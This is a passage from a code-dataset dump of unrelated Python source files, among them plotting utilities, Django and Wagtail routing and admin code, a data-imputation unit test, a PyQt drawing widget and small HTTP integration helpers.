\n Args:\n heatmap: 2D array where positions=rows, aas=cols\n title: title of plot\n Returns:\n fig: matplotlib.pyplot figure object\n ax: matplotlib.pyplot axis object\n\n \"\"\"\n fig, ax = plt.subplots(figsize=(50,300))\n resid_map = plt.imshow(heatmap.T, cmap='bwr', norm=DivergingNorm(0.0))\n\n # Set tick locations\n ax.set_yticks(np.arange(heatmap.shape[1]))\n ax.set_xticks(np.arange(heatmap.shape[0]))\n\n # Set tick labels\n ax.set_yticklabels(__aa_idx_dict__.keys())\n ax.set_xticklabels(__pos_idx_dict__.keys())\n plt.xticks(rotation='vertical')\n \n # Set title\n plt.title(title)\n \n # Show figure\n plt.show()\n \n return(fig, ax)\n\n\ndef heatmap_to_pymol(heatmap):\n \"\"\"Calculate values for PyMOL recoloring.\"\"\"\n \n pymol_vals = np.nanmean(heatmap, axis=1)\n return(pymol_vals)","sub_path":"utils/src_utils.py","file_name":"src_utils.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"258444960","text":"import tornado.web, tornado\n\nclass BaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n user_json = self.get_secure_cookie(\"user\")\n if not user_json: return None\n return tornado.escape.json_decode(user_json)\n\n @property\n def redis(self):\n return self.application._redis\n\n\n _client = False\n\n @property\n def client(self):\n if not self._client:\n self._client = tornado.curl_httpclient.CurlAsyncHTTPClient() \n # import pdb;pdb.set_trace()\n\n return self._client\n\nimport re\n\"\"\"\nIn javascript land we throw out everything that isn't alpha num.. makes the\nregex pattern easier\n\"\"\"\nPUNCTUATION_CHARS = \".,;:!?@$%^&*()-<>[]{}\\\\|/'\\\"_#\"\nnopunk = re.compile( r\"[%s]\" % re.escape(PUNCTUATION_CHARS))\nMIN_WORD_LENGTH = 2\n\ndef text2words(text):\n if not text: return []\n text = nopunk.sub(\" \", text) #strip punctuation\n words = [word.lower() for word in text.split() if len(word) >= MIN_WORD_LENGTH]\n return words\n","sub_path":"handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"166372693","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom apps.catalogos.views import *\nfrom apps.catalogos.ajax import eliminar_identificador\n\n\nurlpatterns = [\n #url(r'^tipo/listar', login_required(catalogo_list.as_view()), name='catalogo_listar'),\n url(r'^tipo/listar/', login_required(catalogo_list), name='catalogo_listar'),\n url(r'eliminar_identificador/$', eliminar_identificador, name='eliminar_identificador'),\n url(r'^tipo/nuevo', login_required(catalogo_view), name='catalogo_nuevo'),\n url(r'^tipo/editar/(?P\\d+)/$', login_required(catalogo_update.as_view()), name='catalogo_editar'),\n url(r'^tipo/eliminar/(?P\\d+)/$', login_required(catalogo_delete.as_view()), name='catalogo_eliminar'),\n url(r'^tecnologias/listar', login_required(tecnologia_list), name='tecnologia_listar'),\n url(r'^tecnologias/nuevo', login_required(tecnologia_view), name='tecnologia_nuevo'),\n url(r'^tecnologias/editar/(?P\\d+)/$', login_required(tecnologia_update.as_view()), name='tecnologia_editar'),\n url(r'^tecnologias/eliminar/(?P\\d+)/$', login_required(tecnologia_delete.as_view()), name='tecnologia_eliminar'),\n url(r'^personas/listar', login_required(persona_list), name='persona_listar'),\n url(r'^personas/nuevo', login_required(persona_view), name='persona_nuevo'),\n url(r'^personas/editar/(?P\\d+)/$', login_required(persona_update.as_view()), name='persona_editar'),\n url(r'^personas/eliminar/(?P\\d+)/$', login_required(persona_delete.as_view()), name='persona_eliminar'),\n url(r'^especialidades/listar', login_required(especialidad_list), name='especialidad_listar'),\n url(r'^especialidades/nuevo', login_required(especialidad_view), name='especialidad_nuevo'),\n url(r'^especialidades/editar/(?P\\d+)/$', login_required(especialidad_update.as_view()), name='especialidad_editar'),\n url(r'^especialidades/eliminar/(?P\\d+)/$', login_required(especialidad_delete.as_view()), name='especialidad_eliminar'),\n url(r'^estatus/listar', login_required(estatus_list), name='estatus_listar'),\n url(r'^estatus/nuevo', login_required(estatus_view), name='estatus_nuevo'),\n url(r'^estatus/editar/(?P\\d+)/$', login_required(estatus_update.as_view()), name='estatus_editar'),\n url(r'^estatus/eliminar/(?P\\d+)/$', login_required(estatus_delete.as_view()), name='estatus_eliminar'),\n url(r'^documentos/listar', login_required(documentos_list), name='documentos_listar'),\n url(r'^documentos/nuevo', login_required(documentos_view), name='documentos_nuevo'),\n url(r'^documentos/editar/(?P\\d+)/$', documentos_update, name='documentos_editar'),\n url(r'^documentos/eliminar/(?P\\d+)/$', login_required(documentos_delete.as_view()), name='documentos_eliminar'),\n\n]","sub_path":"apps/catalogos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652442861","text":"import functools\nimport numpy as np\nimport sys\nimport time\nimport unittest\n\nfrom arch.api import eggroll\nfrom federatedml.feature.instance import Instance\nfrom federatedml.feature.imputer import Imputer\n\nfrom sklearn.preprocessing import StandardScaler as SSL\nclass TestMinMaxScaler(unittest.TestCase):\n def setUp(self):\n local_time = time.localtime(time.time())\n str_time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n \n self.test_data = [\n [ \"0.254879\", \"na\", \"0.209656\", \"NA\",\"-0.441366\", \"Na\",\"-0.485934\", \"nA\",\"-0.287570\",\"-0.733474\"],\n [ \"-1.142928\", \"\",\"-1.166747\",\"-0.923578\", \"0.628230\",\"-1.021418\",\"-1.111867\",\"-0.959523\",\"-0.096672\",\"-0.121683\"],\n [ \"-1.451067\",\"-1.406518\", \"none\",\"-1.092337\", \"None\",\"-1.168557\",\"-1.305831\",\"-1.745063\",\"-0.499499\",\"-0.302893\"],\n [ \"-0.879933\", \"null\",\"-0.877527\",\"-0.780484\",\"-1.037534\",\"-0.483880\",\"-0.555498\",\"-0.768581\", \"0.433960\",\"-0.200928\"],\n [ \"0.426758\", \"0.723479\", \"0.316885\", \"0.287273\", \"1.000835\", \"0.962702\", \"1.077099\", \"1.053586\", \"2.996525\", \"0.961696\"],\n [ \"0.963102\", \"1.467675\", \"0.829202\", \"0.772457\",\"-0.038076\",\"-0.468613\",\"-0.307946\",\"-0.015321\",\"-0.641864\",\"-0.247477\"],\n [ \"-0.662496\", \"0.212149\",\"-0.620475\",\"-0.632995\",\"-0.327392\",\"-0.385278\",\"-0.077665\",\"-0.730362\", \"0.217178\",\"-0.061280\"],\n [ \"-0.453343\",\"-2.147457\",\"-0.473631\",\"-0.483572\", \"0.558093\",\"-0.740244\",\"-0.896170\",\"-0.617229\",\"-0.308601\",\"-0.666975\"],\n [ \"-0.606584\",\"-0.971725\",\"-0.678558\",\"-0.591332\",\"-0.963013\",\"-1.302401\",\"-1.212855\",\"-1.321154\",\"-1.591501\",\"-1.230554\"],\n [ \"-0.583805\",\"-0.193332\",\"-0.633283\",\"-0.560041\",\"-0.349310\",\"-0.519504\",\"-0.610669\",\"-0.929526\",\"-0.196974\",\"-0.151608\"]\n ]\n self.test_instance = []\n for td in self.test_data:\n self.test_instance.append(td)\n self.table_instance = self.data_to_eggroll_table(self.test_instance, str_time)\n \n def print_table(self, table):\n for v in (list(table.collect())):\n print(v[1].features)\n\n def data_to_eggroll_table(self, data, jobid, partition=1, work_mode=0):\n eggroll.init(jobid, mode=work_mode)\n data_table = eggroll.parallelize(data, include_key=False, partition = 10)\n return data_table\n\n def table_to_list(self, table_instance):\n res_list = []\n for k, v in list(table_instance.collect()):\n res_list.append(list(v))\n \n return res_list\n \n def fit_test_data(self, data, fit_values, imputer_value):\n for j in range(len(data)):\n for i in range(len(data[j])):\n if data[j][i].lower() in imputer_value:\n data[j][i] = str(fit_values[i])\n return data\n\n\n def fit_test_data_float(self, data, fit_values, imputer_value):\n for j in range(len(data)):\n for i in range(len(data[j])):\n if data[j][i].lower() in imputer_value:\n data[j][i] = float(fit_values[i])\n data[j][i] = float(data[j][i])\n return data\n\n def test_fit_min(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"min\", output_format = 'str')\n cols_transform_value_ground_true = [-1.451067,-2.147457,-1.166747,-1.092337,-1.037534,-1.302401,-1.305831,-1.745063,-1.591501,-1.230554]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_max(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"max\", output_format = 'str')\n cols_transform_value_ground_true = [0.963102,1.467675,0.829202,0.772457,1.000835,0.962702,1.077099,1.053586,2.996525,0.961696]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_mean(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"mean\", output_format = 'str')\n cols_transform_value_ground_true = [-0.413542, -0.330818, -0.343831, -0.444957, -0.107726, -0.569688, -0.548734, -0.670353, 0.002498, -0.275518]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n\n def test_fit_replace_value(self):\n imputer_value = [ 'NA', 'naaa' ] \n imputer = Imputer(imputer_value)\n process_data, cols_transform_value = imputer.fit(self.table_instance,replace_method=\"designated\", replace_value='111111', output_format = 'str')\n cols_transform_value_ground_true = [ '111111' for _ in range(10) ]\n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_none_replace_method(self):\n imputer_value = [ 'NA', 'naaa' ] \n imputer = Imputer(imputer_value)\n process_data, cols_transform_value = imputer.fit(self.table_instance, output_format = 'str')\n cols_transform_value_ground_true = [ '0' for _ in range(10) ]\n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n \n def test_fit_max_float(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"max\", output_format = 'float')\n cols_transform_value_ground_true = [0.963102,1.467675,0.829202,0.772457,1.000835,0.962702,1.077099,1.053586,2.996525,0.961696]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data_float(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"federatedml/feature/test/imputer_test.py","file_name":"imputer_test.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"453822289","text":"\"\"\"\n\n\"\"\"\n\nclass Box:\n\n def __init__(self, number = 0, name = \"\", enabled = True):\n\n self._num = number\n self._na = name\n self._boo = enabled\n\nclass ColorBox:\n def __init__(self, number=0, name=\"\", enabled=True, color=\"\"):\n self._num = number\n self._na = name\n self._boo = enabled\n self._col = color\n\n\nb1 = Box()\nb2 = Box()\nb3 = Box()\nb4 = Box()\nb5 = Box()\n\nlist_1 = [b1, b2, b3, b4, b5]\n","sub_path":"ect/sm_11-07.py","file_name":"sm_11-07.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"635457845","text":"# 模块名: multiprocessing\nimport multiprocessing\nimport time\n\n\n# 上传内容\ndef upload():\n for i in range(5):\n print('上传...', i+1)\n time.sleep(0.1)\n\n\ndef download():\n for i in range(5):\n print('下载电影.......', i+1)\n time.sleep(0.1)\n\n\nif __name__ == '__main__':\n # 创建两个子进程\n # 上传单独使用一个子进程\n p1 = multiprocessing.Process(target=upload)\n # 下载单独使用一个子进程\n p2 = multiprocessing.Process(target=download)\n\n # 进程使用,需要开启\n p1.start()\n p2.start()\n","sub_path":"07-进程-多进程体验进程.py","file_name":"07-进程-多进程体验进程.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"391261347","text":"from kzpy3.utils import *\n\nimport matplotlib\ntry:\n import cv2\nexcept:\n print(\"Couldn't import cv\")\n\n\nMacOSX = False\nif '/Users/' in home_path:\n MacOSX = True\n\nif MacOSX:\n matplotlib.use(u'MacOSX')\n\n\n###########\n'''\ne.g.\nfrom kzpy3.vis import *; kzpy_vis_test()\n'''\n################\n\nimport matplotlib.pyplot as plt # the Python plotting package\nplt.ion()\nplot = plt.plot\nhist = plt.hist\nxlim = plt.xlim\nylim = plt.ylim\nclf = plt.clf\npause = plt.pause\nfigure = plt.figure\ntitle = plt.title\nplt.ion()\nplt.show()\nPP,FF = plt.rcParams,'figure.figsize'\n\n\ndef kzpy_vis_test():\n img_dic = get_some_images()\n ppff = PP[FF]\n PP[FF] = 3,3\n mi(img_dic['bay'],'bay')\n PP[FF] = ppff\n plt.figure('hist')\n plt.hist(np.random.randn(10000),bins=100)\n True\n\ndef hist(data,bins=100):\n \"\"\"\n default hist behavior\n \"\"\"\n plt.clf()\n plt.hist(data,bins=bins)\n pass\nplot = plt.plot\nfigure = plt.figure\nclf=plt.clf\n\n\n\ntry:\n # - These allow for real-time display updating\n from cStringIO import StringIO\n import scipy.ndimage as nd\n import PIL.Image\n if MacOSX:\n from IPython.display import clear_output, Image, display\n def showarray(a, fmt='jpeg'):\n a = np.uint8(np.clip(255.0*z2o(a), 0, 255))\n f = StringIO()\n PIL.Image.fromarray(a).save(f, fmt)\n display(Image(data=f.getvalue()))\nexcept:\n print(\"kzpy3.vis: PIL image display not imported.\")\n\ndef toolbar():\n plt.rcParams['toolbar'] = 'toolbar2'\n \n######################\n#\ndef mi(\n image_matrix,\n figure_num = 1,\n subplot_array = [1,1,1],\n img_title = '',\n img_xlabel = 'x',\n img_ylabel = 'y',\n cmap = 'gray',\n toolBar = True,\n do_clf = True,\n do_axis = False ):\n \"\"\"\n My Imagesc, displays a matrix as grayscale image if 2d, or color if 3d.\n Can take different inputs -- e.g.,\n\n from matrix:\n\n from kzpy3.vis import *\n mi(np.random.rand(256,256),99,[1,1,1],'random matrix')\n\n from path:\n mi(opjh('Desktop','conv1'),1,[5,5,0])\n\n from list:\n l = load_img_folder_to_list(opjh('Desktop','conv5'))\n mi(l,2,[4,3,0])\n\n from dict:\n mi(load_img_folder_to_dict(opjh('Desktop','conv5')),1,[3,4,0])\n \"\"\"\n if type(image_matrix) == str:\n mi(load_img_folder_to_dict(image_matrix),image_matrix,subplot_array,img_title,img_xlabel,img_ylabel,cmap,toolBar)\n return\n\n if type(image_matrix) == list:\n if np.array(subplot_array).max() < 2:\n subplot_array = [1,len(image_matrix),0]\n for i in range(len(image_matrix)):\n mi(image_matrix[i],figure_num,[subplot_array[0],subplot_array[1],i+1],img_title,img_xlabel,img_ylabel,cmap,toolBar)\n return\n\n if type(image_matrix) == dict:\n if np.array(subplot_array).max() < 2:\n subplot_array = [1,len(image_matrix),0]\n i = 0\n img_keys = sorted(image_matrix.keys(),key=natural_keys)\n for k in img_keys:\n mi(image_matrix[k],figure_num,[subplot_array[0],subplot_array[1],i+1],img_title,img_xlabel,img_ylabel,cmap,toolBar)\n i += 1\n return \n\n if toolBar == False:\n plt.rcParams['toolbar'] = 'None'\n else:\n plt.rcParams['toolbar'] = 'toolbar2'\n\n f = plt.figure(figure_num)\n if do_clf:\n #print('plt.clf()')\n plt.clf()\n\n if True:\n f.subplots_adjust(bottom=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.1)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.05)\n f.subplots_adjust(right=0.95)\n if False:\n f.subplots_adjust(bottom=0.0)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.0)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.0)\n f.subplots_adjust(right=1.0)\n f.add_subplot(subplot_array[0],subplot_array[1],subplot_array[2])\n imgplot = plt.imshow(image_matrix, cmap)\n imgplot.set_interpolation('nearest')\n if not do_axis:\n plt.axis('off')\n if len(img_title) > 0:# != 'no title':\n plt.title(img_title)\n#\n######################\n\n\n\n\n\n\n\n\n\ndef mp(args,figure_num=1, subplot_array=[1,1,1],\n title='', xlabel='', ylabel='', xlim=[], ylim=[], toolBar=False):\n\n if toolBar == False:\n plt.rcParams['toolbar'] = 'None'\n else:\n plt.rcParams['toolbar'] = 'toolbar2'\n\n f = plt.figure(figure_num)\n\n if False:\n f.subplots_adjust(bottom=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.1)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.05)\n f.subplots_adjust(right=0.95)\n\n f.add_subplot(subplot_array[0],subplot_array[1],subplot_array[2])\n imgplot = plt.plot(*args)\n if len(title) > 0:# != 'no title':\n plt.title(title)\n else:\n plt.title(str(subplot_array[2]))\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if len(xlim)==2:\n plt.xlim(xlim) \n if len(ylim)==2:\n plt.ylim(ylim)\n\n\ndef yb_color_modulation_of_grayscale_image(img,y,b,opt_lower_contrast=True):\n\n if len(np.shape(img))>2:\n img = np.mean(img,axis=2)\n img = z2o(img)\n\n if opt_lower_contrast:\n print('low contrast option')\n img = (1.0+img)/3.0\n\n y = z2o(y)\n b = z2o(b)\n\n ci = np.zeros((np.shape(img)[0],np.shape(img)[1],3))\n print(np.shape(ci))\n for i in range(3):\n ci[:,:,i] = 1.0*img\n ci = ci/np.max(ci)\n\n for i in range(3):\n ci[:,:,i] *= (1-y)\n for i in [0,1]:\n ci[:,:,i] += y\n\n for i in range(3):\n ci[:,:,i] *= (1-b)\n for i in [2]:\n ci[:,:,i] += b\n \n return ci\n\n \n \ndef get_some_images():\n '''\n Load some images that can be used for demos, etc.\n e.g., img_dic = get_some_images(); mi(img_dic['bay'])\n '''\n img_dic = {}\n img_dic['bay'] = imread(opj(home_path,'Pictures','bay2.png'))\n return img_dic\n\n\n\n# take an array of shape (n, height, width) or (n, height, width, channels)\n# and visualize each (height, width) thing in a grid of size approx. sqrt(n) by sqrt(n)\ndef vis_square(data_in, padsize=1, padval=0):\n data = data_in.copy()\n data -= data.min()\n data /= data.max()\n \n # force the number of filters to be square\n n = int(np.ceil(np.sqrt(data.shape[0])))\n padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)\n data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))\n \n # tile the filters into an image\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\n data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])\n \n return data\n\n\n\nimport matplotlib.colors\ndef make_colormap(seq):\n \"\"\"Return a LinearSegmentedColormap\n seq: a sequence of floats and RGB-tuples. The floats should be increasing\n and in the interval (0,1).\n \"\"\"\n seq = [(None,) * 3, 0.0] + list(seq) + [1.0, (None,) * 3]\n cdict = {'red': [], 'green': [], 'blue': []}\n for i, item in enumerate(seq):\n if isinstance(item, float):\n r1, g1, b1 = seq[i - 1]\n r2, g2, b2 = seq[i + 1]\n cdict['red'].append([item, r1, r2])\n cdict['green'].append([item, g1, g2])\n cdict['blue'].append([item, b1, b2])\n return matplotlib.colors.LinearSegmentedColormap('CustomMap', cdict)\n\n''' from http://stackoverflow.com/questions/16834861/create-own-colormap-using-matplotlib-and-plot-color-scale\ne.g.,\n\nc = matplotlib.colors.ColorConverter().to_rgb\nrvb = make_colormap(\n [c('red'), c('violet'), 0.33, c('violet'), c('blue'), 0.66, c('blue')])\nN = 1000\narray_dg = np.random.uniform(0, 10, size=(N, 2))\ncolors = np.random.uniform(-2, 2, size=(N,))\nplt.scatter(array_dg[:, 0], array_dg[:, 1], c=colors, cmap=rvb)\nplt.colorbar()\nplt.show()\n'''\n\n\n\n\n\ndef load_img_folder_to_dict(img_folder):\n '''Assume that *.* selects only images.'''\n img_fns = gg(opj(img_folder,'*.*'))\n imgs = {}\n for f in img_fns:\n imgs[f.split('/')[-1]] = imread(f)\n return imgs\n\ndef load_img_folder_to_list(img_folder):\n return dict_to_sorted_list(load_img_folder_to_dict(img_folder))\n\n\n\ndef my_scatter(x,y,xmin,xmax,fig_wid,fig_name):\n plt.figure(fig_name,(fig_wid,fig_wid))\n plt.clf()\n plt.plot(x,y,'bo')\n plt.title(np.corrcoef(x,y)[0,1])\n plt.xlim(xmin,xmax)\n plt.ylim(xmin,xmax)\n\n\n\ndef apply_rect_to_img(img,value,min_val,max_val,pos_color,neg_color,rel_bar_height,rel_bar_thickness,center=False,reverse=False,horizontal=False):\n #print(value)\n h,w,d = shape(img)\n p = (value - min_val) / (max_val - 1.0*min_val)\n if reverse:\n p = 1.0 - p\n if p > 1:\n p = 1\n if p < 0:\n p = 0\n wp = int(p*w)\n hp = int(p*h)\n bh = int((1-rel_bar_height) * h)\n bt = int(rel_bar_thickness * h)\n bw = int((1-rel_bar_height) * w)\n\n if horizontal:\n if center:\n if wp < w/2:\n img[(bh-bt/2):(bh+bt/2),(wp):(w/2),:] = neg_color\n else:\n img[(bh-bt/2):(bh+bt/2),(w/2):(wp),:] = pos_color\n else:\n img[(bh-bt/2):(bh+bt/2),0:wp,:] = pos_color\n else:\n if center:\n if hp < h/2:\n img[(hp):(h/2),(bw-bt/2):(bw+bt/2),:] = neg_color\n else:\n img[(h/2):(hp),(bw-bt/2):(bw+bt/2),:] = pos_color\n\n else:\n img[hp:h,(bw-bt/2):(bw+bt/2),:] = pos_color\n\n\ndef plt_square():\n plt.gca().set_aspect('equal',adjustable='box')\n plt.draw()\n\n\n\ndef function_close_all_windows():\n plt.close('all')\nCA = function_close_all_windows\n\n\n\ndef mi_or_cv2_animate(img_array,cv=True,delay=30,title='animate'):\n if type(img_array)==np.ndarray:\n for i in range(len(img_array)):\n mi_or_cv2(img_array[i],cv,delay,title) \n elif type(img_array)==np.ndarray:\n for i in range(len(img_array[0])):\n mi_or_cv2(img_array[i],cv,delay,title)\n else:\n print('I am confused')\n assert(False)\n\ndef mi_or_cv2(img,cv=True,delay=30,title='animate'):\n if cv:\n cv2.imshow(title,cv2.cvtColor(img,cv2.COLOR_RGB2BGR))\n if cv2.waitKey(delay) & 0xFF == ord('q'):\n pass\n else:\n mi(img,title)\n pause(0.0001)\n\n","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":10333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"254955347","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nimport numpy as np\nimport qimage2ndarray\nimport cv2 as cv\n\n\nclass backImage(QtWidgets.QGraphicsView):\n def __init__(self, parent=None):\n super(backImage, self).__init__(parent)\n self.wid = 1200\n self.heit = 900\n self.setFixedSize(self.wid, self.heit)\n self.setScene(QtWidgets.QGraphicsScene(self))\n self.pixmapItem = (\n QtWidgets.QGraphicsPixmapItem()\n ) # check if everytime you open a new image the old image is still an item\n self.scene().addItem(self.pixmapItem)\n self._path_item = None\n self.img = None\n self.filename = \"\"\n self.setFrameStyle(QFrame.NoFrame)\n\n def initial_path(self):\n self._path = QtGui.QPainterPath()\n pen = QtGui.QPen(\n QtGui.QColor(\"white\"), 1.5, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap\n )\n self._path_item = self.scene().addPath(self._path, pen)\n\n # @QtCore.pyqtSlot()\n def setImage(self, width, height):\n self.scene().clear()\n self.wid = width\n self.heit = height\n print(\"width: {0} height {1}\".format(width, height))\n self.scene().setSceneRect(0, 0, self.wid, self.heit)\n self.pixmapItem = (\n QtWidgets.QGraphicsPixmapItem()\n ) # check if everytime you open a new image the old image is still an item\n self.scene().addItem(self.pixmapItem)\n self.setFixedSize(width, height)\n\n def mousePress(self, pos):\n try:\n self.initial_path()\n\n self._path.moveTo(self.mapToScene(pos))\n self._path_item.setPath(self._path)\n self.scene().addItem(self.pixmapItem)\n\n self._path_item.setPath(self._path)\n except Exception as e:\n print(\"press event {0}\".format(e))\n # super(backImage, self).mousePressEvent(event)\n\n def mouseMove(self, pos):\n self._path.lineTo(self.mapToScene(pos))\n self._path_item.setPath(self._path)\n # super(backImage, self).mouseMoveEvent(event)\n\n def mouseRelease(self, pos):\n self._path.lineTo(self.mapToScene(pos))\n self._path.closeSubpath()\n self._path_item.setPath(self._path)\n # self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(255, 0, 0)))\n self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(\"white\")))\n self._path_item = None\n\n # super(backImage, self).mouseReleaseEvent(event)\n\n def fullSelect(self):\n self.initial_path()\n self._path.moveTo(self.mapToScene(QPoint(1, 1)))\n self._path_item.setPath(self._path)\n self.scene().addItem(self._path_item)\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(self.wid - 1, 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(self.wid - 1, self.heit - 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(1, self.heit - 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(1, 1)))\n self._path.closeSubpath()\n self._path_item.setPath(self._path)\n self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(\"white\")))\n self._path_item = None\n\n pass\n\n def save(self):\n rect = self.scene().sceneRect()\n self.img = QtGui.QImage(rect.width(), rect.height(), QtGui.QImage.Format_ARGB32)\n painter = QtGui.QPainter(self.img)\n rectf = QRectF(0, 0, self.img.rect().width(), self.img.rect().height())\n self.scene().render(painter, rectf, rect)\n try:\n npImg = qimage2ndarray.rgb_view(self.img)\n # filename, _ = QtWidgets.QFileDialog.getSaveFileName(\n # None, \"save Image\", self.filename, \"Image Files (*.png)\"\n # )\n # if filename:\n # cv.imwrite(filename,npImg)\n # cv.imshow(\"img\",npImg)\n return cv.cvtColor(npImg,cv.COLOR_BGR2GRAY)\n except Exception as e:\n print(e)\n return None\n\n# if __name__ == \"__main__\":\n# app = QtWidgets.QApplication(sys.argv)\n# w = QWidget()\n# btnSave = QPushButton(\"Save image\")\n# view = GraphicsView()\n# view.setImage()\n# w.setLayout(QVBoxLayout())\n# w.layout().addWidget(btnSave)\n# w.layout().addWidget(view)\n# btnSave.clicked.connect(lambda: view.save())\n# w.show()\n# sys.exit(app.exec_())\n","sub_path":"BaoSteelProject1/UI/step4_backImage.py","file_name":"step4_backImage.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"178010582","text":"import os\nimport json\nimport logging\nimport requests\nimport dotenv\n\ndotenv.load_dotenv()\n\nHEADERS = {'Authorization': 'Basic {}'.format(os.environ.get('AUTH_1C'))}\nBASE_URL_1C = os.environ.get('BASE_URL_1C')\nDEBUG = os.environ.get('DEBUG', '') == 'True'\n\nURL_VICIDIAL = os.environ.get('VICIDIAL_URL')\n\n\ndef make_request_to_1c(resource, req):\n url = BASE_URL_1C + resource\n try:\n res = requests.post(\n url,\n data=json.dumps(req, ensure_ascii=False).encode('utf-8'),\n headers=HEADERS,\n verify=False\n )\n rt = res.json()\n if DEBUG:\n print('====================REQUEST====================')\n print(req)\n print('====================RESPONSE====================')\n print(res.text)\n print('====================END====================')\n except Exception as e:\n logger = logging.getLogger('vicidial')\n logger.error(f'1C error: {str(e)} res: {res.text}')\n rt = {'error': 'connection error'}\n return rt\n\n\ndef make_request_to_vicidial(resource, data):\n url = URL_VICIDIAL + resource\n req_data = {\n 'user': os.environ.get('VICIDIAL_LOGIN'),\n 'pass': os.environ.get('VICIDIAL_PASS'),\n 'source': 'test'\n }\n req_data.update(data)\n response = requests.get(\n url,\n params=req_data,\n verify=False)\n return {'res': response.text}\n","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311169755","text":"from django.contrib import admin\nfrom wagtail.contrib.modeladmin.options import ModelAdmin, modeladmin_register\n\nfrom .models import Product, Promotion, CompanyPage\n\nclass ProductAdmin(ModelAdmin):\n model = Product\n menu_label = 'Products'\n menu_icon = 'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title', 'company', 'service_type',)\n search_fields = ('title', 'company', 'service_type',)\n\n\nclass PromotionAdmin(ModelAdmin):\n model = Promotion\n menu_label = 'Promotions'\n menu_icon = 'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title', 'company',)\n search_fields = ('title', 'company',)\n\n\nclass CompanyAdmin(ModelAdmin):\n model = 